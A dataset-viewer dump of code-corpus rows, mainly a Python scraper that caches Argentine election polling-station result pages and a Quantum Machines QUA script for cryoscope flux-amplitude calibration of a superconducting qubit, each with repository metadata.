STATIC_URL = '/static/'
|
[
"noreply@github.com"
] |
Lubl-42.noreply@github.com
|
bde48762b39c43c11c6ea2a63fe088105161ec35
|
15160952eaf4fd203b91850cc1def80b89fb5bea
|
/requester.py
|
b23e95d1be13eede7a4ea0333e361178ff128ef4
|
[] |
no_license
|
gustingonzalez/arg-parliamentary-election-analyzer
|
3cb9bffcdb902dac40c18ba0bfbb4b1c8f0d4555
|
d7352922fc09cac447789b0a10ac44c0fbf2ae01
|
refs/heads/master
| 2021-08-14T07:55:28.949870
| 2017-11-15T01:37:02
| 2017-11-15T01:37:02
| 110,635,901
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,373
|
py
|
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
- Nombre: requester.py
- Descripción: obtiene el conjunto de documentos html, según los parámetros de
la sección "Connection", para luego almacenarlos en el directorio (WebCache)
especificado en el archivo de configuración.
- Autor: Agustín González.
- Modificado: 05/11/17
"""
import os
import sys
import time
import http.client
from lib import utils
class VotingStationRange(object):
"""Rango de mesas de circuito."""
def __init__(self, circuit, init, end):
self.circuit = circuit
self.init = init
self.end = end
def parse_ranges(scircuits, sranges):
"""Realiza parseo de str de config de rangos a lista."""
lcircuits = [x.strip() for x in scircuits.split(",")]
lranges = [x.strip() for x in sranges.split(",")]
if(len(lcircuits) != len(lranges)):
exit("La cantidad de circuitos y de rangos no coincide.")
# Lista de objetos.
ranges = []
# Recorrida de circuitos.
for circuit in lcircuits:
# Pop de ranges y split para obtención de subrangos.
subranges = lranges.pop(0).split(" ")
# Exploración de subrangos
for subrange in subranges:
splitted = subrange.split("-")
init = int(splitted[0])
end = int(splitted[1])
# Creación de vtrange.
vtrange = VotingStationRange(circuit, init, end)
# Append a list.
ranges.append(vtrange)
return ranges
def build_url(url_path_format, province, district, circuit, vtnumber):
"""Realiza build de url en base a parámetros."""
# Fill de circuit con "_" (len debe ser 5).
tofillcircuit = 5 - len(circuit)
filledcircuit = circuit + "_" * tofillcircuit
# Armado de URL.
url = url_path_format.format(province, district, circuit,
vtnumber.zfill(5), filledcircuit)
return url
def save(html, path):
"""Almacena html en path indicado."""
fhtml = open(path, "w")
fhtml.write(html)
fhtml.close()
def main(args):
utils.clearscreen()
# Lectura de configuración
cfg = utils.cfg()
section = "Connection"
# Host.
host = cfg[section]["Host"]
# URL.
url_path_format = cfg[section]["URLPathFormat"]
# Prov. number
province = cfg[section]["Province"]
# Distrito.
district = cfg[section]["District"]
# Rangos de mesa por circuito.
vtranges = parse_ranges(cfg[section]["Circuits"],
cfg[section]["Ranges"])
# Directorio.
dir = cfg["Dirs"]["WebCache"]
# Creación de directorio (si no existe no lo vuelve a crear.)
utils.makedirs(dir)
# Recorrida de rangos de mesa.
for vtrange in vtranges:
# Recorrida de mesas.
for vtnumber in range(vtrange.init, vtrange.end+1):
# 1. Verificación de existencia de path.
print("Mesa {0} - ".format(vtnumber), end="")
circuit = vtrange.circuit
path = dir + "/" + str(circuit) + "_" + str(vtnumber) + ".htm"
os.path.exists(dir)
# Si existe el path.
if os.path.exists(path):
print("Ya existe en caché.")
# No se realiza conexión.
continue
# 2. Request a host.
connection = http.client.HTTPConnection(host, 80)
connection.connect()
url = build_url(url_path_format, province, district,
circuit, str(vtnumber))
connection.request("GET", url)
# 3. Get de response.
print("Obteniendo: " + url)
response = connection.getresponse()
# 4. Verificación de status.
if(response.status == 404):
msg = "No existe response a partir de la mesa {0}."
print(msg.format(vtnumber))
input("Presione ENTER para continuar...")
break
# 5. HTML (se utiliza decode, ya que read retorna bytes).
html = response.read().decode("utf-8")
# 6. Save de html en path circuit_vtnumber
save(html, path)
# 7. Sleep para evitar posible baneo de IP.
time.sleep(0.1)
# Entrada de aplicación.
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
[
"agustin.ang.92@gmail.com"
] |
agustin.ang.92@gmail.com
|
1b9bc37ea8783d6db001d18bba0bbd9805adc243
|
263c79fd1d8541f0cf0b5dd9ed1c5e8acd463556
|
/Quantum-Control-Applications/Superconducting/Single-Flux-Tunable-Transmon/17_cryoscope_amplitude_calibration.py
|
be89a108342c5d47a45e3284cfd32425563c5d81
|
[
"BSD-3-Clause"
] |
permissive
|
qua-platform/qua-libs
|
d929681da67fa4e88e96d0f96eef19034146a039
|
245bdeb625e2e64005962a02dcb58d3441e6afc6
|
refs/heads/main
| 2023-09-01T06:04:57.665500
| 2023-08-29T15:01:47
| 2023-08-29T15:01:47
| 293,225,951
| 45
| 13
|
BSD-3-Clause
| 2023-09-05T08:09:32
| 2020-09-06T07:29:42
|
Python
|
UTF-8
|
Python
| false
| false
| 10,604
|
py
|
"""
CRYOSCOPE
The goal of this protocol is to measure the step response of the flux line and design proper FIR and IIR filters
(implemented on the OPX) to pre-distort the flux pulses and improve the two-qubit gates fidelity.
Since the flux line ends on the qubit chip, it is not possible to measure the flux pulse after propagation through the
fridge. The idea is to exploit the flux dependency of the qubit frequency, measured with a modified Ramsey sequence, to
estimate the flux amplitude received by the qubit as a function of time.
The sequence consists of a Ramsey sequence ("x90" - idle time - "x90" or "y90") with a fixed dephasing time.
A flux pulse with varying duration is played during the idle time. The Sx and Sy components of the Bloch vector are
measured by alternatively closing the Ramsey sequence with a "x90" or "y90" gate in order to extract the qubit dephasing
as a function of the flux pulse duration.
The results are then post-processed to retrieve the step function of the flux line which is fitted with an exponential
function. The corresponding exponential parameters are then used to derive the FIR and IIR filter taps that will
compensate for the distortions introduced by the flux line (wiring, bias-tee...).
Such digital filters are then implemented on the OPX.
The protocol is inspired from https://doi.org/10.1063/1.5133894, which contains more details about the sequence and
the post-processing of the data.
This version sweeps the flux pulse duration using the baking tool, which means that the flux pulse can be scanned with
a 1ns resolution, but must be shorter than ~260ns. If you want to measure longer flux pulse, you can either reduce the
resolution (do 2ns steps instead of 1ns) or use the 4ns version (cryoscope_4ns.py).
Prerequisites:
- Having found the resonance frequency of the resonator coupled to the qubit under study (resonator_spectroscopy).
- Having calibrated qubit gates (x90 and y90) by running qubit spectroscopy, rabi_chevron, power_rabi, Ramsey and updated the configuration.
Next steps before going to the next node:
- Update the FIR and IIR filter taps in the configuration (config/controllers/con1/analog_outputs/"filter": {"feedforward": fir, "feedback": iir}).
"""
from qm.qua import *
from qm.QuantumMachinesManager import QuantumMachinesManager
from qm import SimulationConfig, LoopbackInterface
from configuration import *
from macros import ge_averaged_measurement
import matplotlib.pyplot as plt
import numpy as np
from qualang_tools.loops import from_array
import warnings
warnings.filterwarnings("ignore")
###################
# The QUA program #
###################
n_avg = 10_000 # Number of averages
# Flag to set to True if state discrimination is calibrated (where the qubit state is inferred from the 'I' quadrature).
# Otherwise, a preliminary sequence will be played to measure the averaged I and Q values when the qubit is in |g> and |e>.
state_discrimination = False
# Flux amplitude sweep (as a pre-factor of the flux amplitude)
flux_amp_array = np.linspace(0, -0.2, 101)
with program() as cryoscope_amp:
n = declare(int) # QUA variable for the averaging loop
flux_amp = declare(fixed) # Flux amplitude pre-factor
flag = declare(bool) # QUA boolean to switch between x90 and y90
I = declare(fixed) # QUA variable for the measured 'I' quadrature
Q = declare(fixed) # QUA variable for the measured 'Q' quadrature
if state_discrimination:
state = declare(bool)
state_st = declare_stream()
I_st = declare_stream() # Stream for the 'I' quadrature
Q_st = declare_stream() # Stream for the 'Q' quadrature
n_st = declare_stream() # Stream for the averaging iteration 'n'
if not state_discrimination:
# Calibrate the ground and excited states readout for deriving the Bloch vector
# The ge_averaged_measurement() function is defined in macros.py
# Note that if you have calibrated the readout to perform state discrimination, then the QUA program below can
# be modified to directly fetch the qubit state.
Ig_st, Qg_st, Ie_st, Qe_st = ge_averaged_measurement(thermalization_time, n_avg)
with for_(n, 0, n < n_avg, n + 1):
with for_(*from_array(flux_amp, flux_amp_array)):
with for_each_(flag, [True, False]):
# Play first X/2
play("x90", "qubit")
# Play truncated flux pulse with varying amplitude
align("qubit", "flux_line")
# Wait some time to ensure that the flux pulse will arrive after the x90 pulse
wait(20 * u.ns)
play("const" * amp(flux_amp), "flux_line")
align("qubit", "flux_line")
# Wait some time to ensure that the 2nd x90 pulse will arrive after the flux pulse
wait(20 * u.ns)
# Play second X/2 or Y/2
align("qubit", "flux_line")
with if_(flag):
play("x90", "qubit")
with else_():
play("y90", "qubit")
# Measure resonator state after the sequence
align("resonator", "qubit")
measure(
"readout",
"resonator",
None,
dual_demod.full("cos", "out1", "sin", "out2", I),
dual_demod.full("minus_sin", "out1", "cos", "out2", Q),
)
# State discrimination if the readout has been calibrated
if state_discrimination:
assign(state, I > ge_threshold)
save(state, state_st)
# Wait cooldown time and save the results
wait(thermalization_time * u.ns, "resonator", "qubit")
save(I, I_st)
save(Q, Q_st)
save(n, n_st)
with stream_processing():
# Cast the data into a 2D matrix (x90/y90, flux amplitudes), average the 2D matrices together and store the
# results on the OPX processor
I_st.buffer(2).buffer(len(flux_amp_array)).average().save("I")
Q_st.buffer(2).buffer(len(flux_amp_array)).average().save("Q")
if state_discrimination:
# Also save the qubit state
state_st.boolean_to_int().buffer(2).buffer(len(flux_amp_array)).average().save("state")
else:
# Also save the averaged I/Q values for the qubit in |g> and |e>
Ig_st.average().save("Ig")
Qg_st.average().save("Qg")
Ie_st.average().save("Ie")
Qe_st.average().save("Qe")
n_st.save("iteration")
#####################################
# Open Communication with the QOP #
#####################################
qmm = QuantumMachinesManager(qop_ip, cluster_name=cluster_name, octave=octave_config)
###########################
# Run or Simulate Program #
###########################
simulate = False
if simulate:
# Simulates the QUA program for the specified duration
simulation_config = SimulationConfig(duration=10_000) # In clock cycles = 4ns
job = qmm.simulate(config, cryoscope_amp, simulation_config)
job.get_simulated_samples().con1.plot()
else:
# Open the quantum machine
qm = qmm.open_qm(config)
# Send the QUA program to the OPX, which compiles and executes it
job = qm.execute(cryoscope_amp)
# Get results from QUA program
if state_discrimination:
results = fetching_tool(job, data_list=["I", "Q", "state", "iteration"], mode="live")
else:
results = fetching_tool(job, data_list=["I", "Q", "Ie", "Qe", "Ig", "Qg", "iteration"], mode="live")
# Live plotting
fig = plt.figure()
interrupt_on_close(fig, job) # Interrupts the job when closing the figure
xplot = flux_amp_array * const_flux_amp
while results.is_processing():
# Fetch results
if state_discrimination:
I, Q, state, iteration = results.fetch_all()
# Convert the results into Volts
I, Q = u.demod2volts(I, readout_len), u.demod2volts(Q, readout_len)
# Bloch vector Sx + iSy
qubit_state = (state[:, 0] * 2 - 1) + 1j * (state[:, 1] * 2 - 1)
else:
I, Q, Ie, Qe, Ig, Qg, iteration = results.fetch_all()
# Phase of ground and excited states
phase_g = np.angle(Ig + 1j * Qg)
phase_e = np.angle(Ie + 1j * Qe)
# Phase of cryoscope measurement
phase = np.unwrap(np.angle(I + 1j * Q))
# Population in excited state
state = (phase - phase_g) / (phase_e - phase_g)
# Convert the results into Volts
I, Q = u.demod2volts(I, readout_len), u.demod2volts(Q, readout_len)
# Bloch vector Sx + iSy
qubit_state = (state[:, 0] * 2 - 1) + 1j * (state[:, 1] * 2 - 1)
# Accumulated phase: angle between Sx and Sy
qubit_phase = np.unwrap(np.angle(qubit_state))
# qubit_phase = qubit_phase - qubit_phase[-1]
detuning = qubit_phase / (2 * np.pi * const_flux_len) * 1000
# Qubit coherence: |Sx+iSy|
qubit_coherence = np.abs(qubit_state)
# Quadratic fit of detuning versus flux pulse amplitude
pol = np.polyfit(xplot, qubit_phase, deg=2)
# Progress bar
progress_counter(iteration, n_avg, start_time=results.get_start_time())
# Plots
plt.subplot(221)
plt.cla()
plt.plot(xplot, np.sqrt(I**2 + Q**2))
plt.xlabel("Flux pulse amplitude [V]")
plt.ylabel("Readout amplitude [a.u.]")
plt.legend(("X", "Y"), loc="lower right")
plt.subplot(222)
plt.cla()
plt.plot(xplot, phase)
plt.xlabel("Flux pulse amplitude [V]")
plt.ylabel("Readout phase [rad]")
plt.legend(("X", "Y"), loc="lower right")
plt.subplot(223)
plt.cla()
plt.plot(xplot, state)
plt.xlabel("Flux pulse amplitude [V]")
plt.ylabel("Excited state population")
plt.legend(("X", "Y"), loc="lower right")
plt.subplot(224)
plt.cla()
plt.plot(xplot, detuning, "bo")
plt.plot(xplot, np.polyval(pol, xplot), "r-")
plt.xlabel("Flux pulse amplitude [V]")
plt.ylabel("Averaged detuning [Hz]")
plt.legend(("data", "Fit"), loc="upper right")
plt.tight_layout()
plt.pause(0.1)
# Close the quantum machines at the end in order to put all flux biases to 0 so that the fridge doesn't heat-up
qm.close()
|
[
"noreply@github.com"
] |
qua-platform.noreply@github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.